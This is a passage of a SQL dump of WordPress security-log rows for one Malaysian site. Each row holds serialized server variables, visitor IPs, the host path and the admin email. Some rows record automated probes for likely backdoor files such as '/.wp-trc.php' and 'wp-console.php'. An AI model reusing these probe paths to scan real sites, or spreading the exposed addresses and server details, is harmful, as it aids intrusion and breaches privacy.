Safari/534.43\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"92.243.101.66\";s:11:\"REMOTE_PORT\";s:5:\"43687\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEUx3upQ8972QULTgziYAAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569789137.3877\";s:12:\"REQUEST_TIME\";s:10:\"1569789137\";}}','notice','2019-09-29 20:32:33','2019-09-29 20:32:18',35614776,37428320,'https://bintara.com.my/?page_id=18',1,0,'92.243.101.66'),(27319,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"187.95.92.90\";s:11:\"REMOTE_PORT\";s:5:\"45112\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEEHnupQ8972QULTgzcTQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569784863.0406\";s:12:\"REQUEST_TIME\";s:10:\"1569784863\";}}','notice','2019-09-29 19:21:08','2019-09-29 19:21:03',35610040,37402256,'https://bintara.com.my/?page_id=18',1,0,'187.95.92.90'),(27318,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/wp-content/uploads/2019/03/wp-console.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"400-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"400-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/uploads/2019/03/wp-console.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/uploads/2019/03/wp-console.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZD8HJdbIPYXuQos2m0sgAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/uploads/2019/03/wp-console.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/uploads/2019/03/wp-console.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZD8HJdbIPYXuQos2m0sgAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"209.205.206.58\";s:11:\"REMOTE_PORT\";s:5:\"53390\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/uploads/2019/03/wp-console.php\";s:10:\"SCRIPT_URL\";s:42:\"/wp-content/uploads/2019/03/wp-console.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZD8HJdbIPYXuQos2m0sgAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569782813.8776\";s:12:\"REQUEST_TIME\";s:10:\"1569782813\";}}','notice','2019-09-29 18:46:55','2019-09-29 18:46:54',35186224,36989064,'https://bintara.com.my/wp-content/uploads/2019/03/wp-console.php',1,0,'209.205.206.58'),(27317,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/wp-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-post.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZDy7nupQ8972QULTgzXpAAAAMM\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZDy7nupQ8972QULTgzXpAAAAMM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"69.163.163.120\";s:11:\"REMOTE_PORT\";s:5:\"38874\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-post.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZDy7nupQ8972QULTgzXpAAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569780463.2296\";s:12:\"REQUEST_TIME\";s:10:\"1569780463\";}}','notice','2019-09-29 18:07:47','2019-09-29 18:07:43',35630952,37430320,'https://bintara.com.my/wp-post.php',1,0,'69.163.163.120'),(27316,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZDqDTsTMh8XWj0I-Ha@8wAAAEg\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"56499\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZDqDTsTMh8XWj0I-Ha@8wAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569778189.5398\";s:12:\"REQUEST_TIME\";s:10:\"1569778189\";}}','notice','2019-09-29 17:29:54','2019-09-29 17:29:50',34448496,36247664,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'141.8.142.158'),(27315,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/.wp-trc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"132-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"132-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"132-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZC@66e6fKO2vmuLqIBjUgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC@66e6fKO2vmuLqIBjUgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"89.19.30.65\";s:11:\"REMOTE_PORT\";s:5:\"56314\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:10:\"SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC@66e6fKO2vmuLqIBjUgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569767147.9762\";s:12:\"REQUEST_TIME\";s:10:\"1569767147\";}}','notice','2019-09-29 14:25:50','2019-09-29 14:25:48',35159672,36960304,'https://bintara.com.my/.wp-trc.php',1,0,'89.19.30.65'),(27314,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"59423\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC@2jsTMh8XWj0I-HappwAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569767130.8835\";s:12:\"REQUEST_TIME\";s:10:\"1569767130\";}}','notice','2019-09-29 14:25:33','2019-09-29 14:25:31',35129808,36935632,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27313,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/.wp-trc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"83-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"83-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"83-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZC@0zsTMh8XWj0I-HappAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC@0zsTMh8XWj0I-HappAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"89.19.30.65\";s:11:\"REMOTE_PORT\";s:5:\"55080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:10:\"SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC@0zsTMh8XWj0I-HappAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569767123.5927\";s:12:\"REQUEST_TIME\";s:10:\"1569767123\";}}','notice','2019-09-29 14:25:25','2019-09-29 